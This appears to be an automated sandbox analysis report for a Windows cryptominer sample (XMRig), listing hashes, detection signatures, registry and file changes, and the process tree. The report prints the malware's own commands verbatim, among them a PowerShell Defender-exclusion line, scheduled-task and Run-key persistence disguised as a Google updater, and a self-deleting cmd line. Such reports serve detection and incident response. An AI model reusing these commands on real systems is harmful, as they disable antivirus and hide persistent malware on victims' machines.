Overview
overview
10Static
static
3grhsghsGHs...y8.exe
windows7-x64
10grhsghsGHs...y8.exe
windows10-2004-x64
10grhsghsGHs...SE.exe
windows7-x64
10grhsghsGHs...SE.exe
windows10-2004-x64
10grhsghsGHs...CD.exe
windows7-x64
10grhsghsGHs...CD.exe
windows10-2004-x64
10grhsghsGHs...Da.exe
windows7-x64
10grhsghsGHs...Da.exe
windows10-2004-x64
10grhsghsGHs...wq.exe
windows7-x64
10grhsghsGHs...wq.exe
windows10-2004-x64
10grhsghsGHs...r7.exe
windows7-x64
10grhsghsGHs...r7.exe
windows10-2004-x64
10grhsghsGHs...XJ.exe
windows7-x64
10grhsghsGHs...XJ.exe
windows10-2004-x64
10grhsghsGHs...eg.exe
windows7-x64
10grhsghsGHs...eg.exe
windows10-2004-x64
10grhsghsGHs...5H.exe
windows7-x64
10grhsghsGHs...5H.exe
windows10-2004-x64
10grhsghsGHs...XN.exe
windows7-x64
10grhsghsGHs...XN.exe
windows10-2004-x64
10grhsghsGHs...T3.exe
windows7-x64
10grhsghsGHs...T3.exe
windows10-2004-x64
10grhsghsGHs...9r.exe
windows7-x64
10grhsghsGHs...9r.exe
windows10-2004-x64
10grhsghsGHs...GR.exe
windows7-x64
10grhsghsGHs...GR.exe
windows10-2004-x64
10grhsghsGHs...EX.exe
windows7-x64
10grhsghsGHs...EX.exe
windows10-2004-x64
10grhsghsGHs...EA.exe
windows7-x64
10grhsghsGHs...EA.exe
windows10-2004-x64
10grhsghsGHs...FB.exe
windows7-x64
10grhsghsGHs...FB.exe
windows10-2004-x64
10Resubmissions
25-01-2024 16:55
240125-vfcyksbhgr 1024-01-2024 17:15
240124-vstf4aecaj 1023-01-2024 19:27
240123-x6cfvagbd9 1023-01-2024 19:27
240123-x6bvbafgem 1023-01-2024 19:27
240123-x6bjjsgbd8 1023-01-2024 19:27
240123-x6ax1sfgek 1023-01-2024 19:27
240123-x6abgsfgej 1023-01-2024 19:27
240123-x591qagbd7 1023-01-2024 19:27
240123-x59d7agbd6 1023-01-2024 19:27
240123-x584esgbd5 10Analysis
-
max time kernel
1568s -
max time network
1789s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
24-01-2024 17:15
Static task
static1
Behavioral task
behavioral1
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral3
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win7-20231129-en
Behavioral task
behavioral6
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral11
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral13
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win7-20231129-en
Behavioral task
behavioral14
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral15
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win7-20231215-en
Behavioral task
behavioral16
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral17
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral19
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win7-20231215-en
Behavioral task
behavioral20
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral21
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win7-20231215-en
Behavioral task
behavioral22
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win7-20231215-en
Behavioral task
behavioral24
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral25
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral27
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win7-20231129-en
Behavioral task
behavioral28
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral29
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win7-20231129-en
Behavioral task
behavioral30
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral31
Sample
grhsghsGHswgh/Yvdp8t5knpQz7sFB.exe
Resource
win7-20231215-en
General
-
Target
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
-
Size
2.0MB
-
MD5
a16a669a09bf158058b83e04e69fe38e
-
SHA1
f6c94763850d9e590d86057139e8895a7aacdeea
-
SHA256
cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
-
SHA512
658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
SSDEEP
49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
Processes:
Q5EUCWHU7pMYBfT3.exeupdater.execonhost.exedescription pid process target process PID 2932 created 1208 2932 Q5EUCWHU7pMYBfT3.exe Explorer.EXE PID 2932 created 1208 2932 Q5EUCWHU7pMYBfT3.exe Explorer.EXE PID 2932 created 1208 2932 Q5EUCWHU7pMYBfT3.exe Explorer.EXE PID 2932 created 1208 2932 Q5EUCWHU7pMYBfT3.exe Explorer.EXE PID 2940 created 1208 2940 updater.exe Explorer.EXE PID 2940 created 1208 2940 updater.exe Explorer.EXE PID 2940 created 1208 2940 updater.exe Explorer.EXE PID 2940 created 1208 2940 updater.exe Explorer.EXE PID 2796 created 1208 2796 conhost.exe Explorer.EXE PID 2940 created 1208 2940 updater.exe Explorer.EXE -
XMRig Miner payload 29 IoCs
Processes:
resource yara_rule behavioral21/memory/1684-68-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-70-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-72-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-76-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-78-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-80-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-82-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-84-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-86-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-88-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-90-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-92-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-94-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-96-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-98-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-100-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-102-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-104-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-111-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-113-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-115-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-117-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-119-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-121-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-123-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-125-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-127-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-129-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/1684-136-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2640 cmd.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 2940 updater.exe -
Loads dropped DLL 1 IoCs
Processes:
taskeng.exepid process 596 taskeng.exe -
Processes:
resource yara_rule behavioral21/memory/1684-64-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-68-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-70-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-72-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-76-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-78-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-80-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-82-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-84-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-86-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-88-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-90-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-92-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-94-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-96-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-98-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-100-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-102-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-104-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-111-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-113-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-115-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-117-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-119-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-121-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-123-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-125-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-127-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-129-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/1684-136-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in System32 directory 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exedescription pid process target process PID 2940 set thread context of 2796 2940 updater.exe conhost.exe PID 2940 set thread context of 1684 2940 updater.exe conhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
cmd.execmd.exeQ5EUCWHU7pMYBfT3.exeupdater.exedescription ioc process File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Chrome\updater.exe Q5EUCWHU7pMYBfT3.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2500 schtasks.exe 1500 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 3 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 20bd96c0b84fda01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
Processes:
Q5EUCWHU7pMYBfT3.exepowershell.exepowershell.exepowershell.exeupdater.exepowershell.exepowershell.execonhost.exepid process 2932 Q5EUCWHU7pMYBfT3.exe 2932 Q5EUCWHU7pMYBfT3.exe 2716 powershell.exe 2932 Q5EUCWHU7pMYBfT3.exe 2932 Q5EUCWHU7pMYBfT3.exe 2860 powershell.exe 2932 Q5EUCWHU7pMYBfT3.exe 2932 Q5EUCWHU7pMYBfT3.exe 2932 Q5EUCWHU7pMYBfT3.exe 2932 Q5EUCWHU7pMYBfT3.exe 2608 powershell.exe 2940 updater.exe 2940 updater.exe 1636 powershell.exe 2940 updater.exe 2940 updater.exe 2012 powershell.exe 2940 updater.exe 2940 updater.exe 2940 updater.exe 2940 updater.exe 2796 conhost.exe 2796 conhost.exe 2940 updater.exe 2940 updater.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 464 -
Suspicious use of AdjustPrivilegeToken 31 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeupdater.exeWMIC.execonhost.exedescription pid process Token: SeDebugPrivilege 2716 powershell.exe Token: SeDebugPrivilege 2860 powershell.exe Token: SeDebugPrivilege 2608 powershell.exe Token: SeDebugPrivilege 1636 powershell.exe Token: SeDebugPrivilege 2012 powershell.exe Token: SeDebugPrivilege 2940 updater.exe Token: SeAssignPrimaryTokenPrivilege 2428 WMIC.exe Token: SeIncreaseQuotaPrivilege 2428 WMIC.exe Token: SeSecurityPrivilege 2428 WMIC.exe Token: SeTakeOwnershipPrivilege 2428 WMIC.exe Token: SeLoadDriverPrivilege 2428 WMIC.exe Token: SeSystemtimePrivilege 2428 WMIC.exe Token: SeBackupPrivilege 2428 WMIC.exe Token: SeRestorePrivilege 2428 WMIC.exe Token: SeShutdownPrivilege 2428 WMIC.exe Token: SeSystemEnvironmentPrivilege 2428 WMIC.exe Token: SeUndockPrivilege 2428 WMIC.exe Token: SeManageVolumePrivilege 2428 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2428 WMIC.exe Token: SeIncreaseQuotaPrivilege 2428 WMIC.exe Token: SeSecurityPrivilege 2428 WMIC.exe Token: SeTakeOwnershipPrivilege 2428 WMIC.exe Token: SeLoadDriverPrivilege 2428 WMIC.exe Token: SeSystemtimePrivilege 2428 WMIC.exe Token: SeBackupPrivilege 2428 WMIC.exe Token: SeRestorePrivilege 2428 WMIC.exe Token: SeShutdownPrivilege 2428 WMIC.exe Token: SeSystemEnvironmentPrivilege 2428 WMIC.exe Token: SeUndockPrivilege 2428 WMIC.exe Token: SeManageVolumePrivilege 2428 WMIC.exe Token: SeLockMemoryPrivilege 1684 conhost.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
powershell.execmd.exepowershell.exetaskeng.exepowershell.exeupdater.execmd.exedescription pid process target process PID 2860 wrote to memory of 2500 2860 powershell.exe schtasks.exe PID 2860 wrote to memory of 2500 2860 powershell.exe schtasks.exe PID 2860 wrote to memory of 2500 2860 powershell.exe schtasks.exe PID 2640 wrote to memory of 1460 2640 cmd.exe choice.exe PID 2640 wrote to memory of 1460 2640 cmd.exe choice.exe PID 2640 wrote to memory of 1460 2640 cmd.exe choice.exe PID 2608 wrote to memory of 548 2608 powershell.exe schtasks.exe PID 2608 wrote to memory of 548 2608 powershell.exe schtasks.exe PID 2608 wrote to memory of 548 2608 powershell.exe schtasks.exe PID 596 wrote to memory of 2940 596 taskeng.exe updater.exe PID 596 wrote to memory of 2940 596 taskeng.exe updater.exe PID 596 wrote to memory of 2940 596 taskeng.exe updater.exe PID 2012 wrote to memory of 1500 2012 powershell.exe schtasks.exe PID 2012 wrote to memory of 1500 2012 powershell.exe schtasks.exe PID 2012 wrote to memory of 1500 2012 powershell.exe schtasks.exe PID 2940 wrote to memory of 2796 2940 updater.exe conhost.exe PID 2416 wrote to memory of 2428 2416 cmd.exe WMIC.exe PID 2416 wrote to memory of 2428 2416 cmd.exe WMIC.exe PID 2416 wrote to memory of 2428 2416 cmd.exe WMIC.exe PID 2940 wrote to memory of 1684 2940 updater.exe conhost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1208
-
C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Q5EUCWHU7pMYBfT3.exe"C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Q5EUCWHU7pMYBfT3.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2932 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2500 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Q5EUCWHU7pMYBfT3.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵PID:1460
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:548
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1636 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:1500 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:1040 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qtdiqnkejoz2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:2796 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
C:\Windows\system32\taskeng.exetaskeng.exe {E31124A8-8DD0-4619-85B4-7967E3B3B858} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:596 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2940
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor1⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2428
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
547KB
MD55fbe8c685fa0180816dd6b953dda0318
SHA16d455629353c20db8ca3ea035559ef6d8718e297
SHA256e3c2877cdbe3eba660109a56741eac8bdefa68a41a4f6e18f3419528ce1e5872
SHA512c19fb53f1ff5d1990db5bc4d778f1e1406727e0d4ad4cf970fc448f476838c806949d2d60333f711fa140354662f8a6ce4c329b91d13cf15b72a97bee0182299
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD577ed1f942b7aba574714572494697c40
SHA191a143c6ce0ca8042deae9854cc30dac27ede318
SHA2565da4085403090d6c2ba2398261c3982cd5063e4f438a1696e256f7947f2d493a
SHA512ae9011ab378fc2b422a063f5450fbd63d66ee7c38150cbcf8111dbf4005fda59d32563c98ab1d385fd43d04785f5cac7214793353e67b5920e219d825aba50c3
-
Filesize
2.0MB
MD5a16a669a09bf158058b83e04e69fe38e
SHA1f6c94763850d9e590d86057139e8895a7aacdeea
SHA256cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
SHA512658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6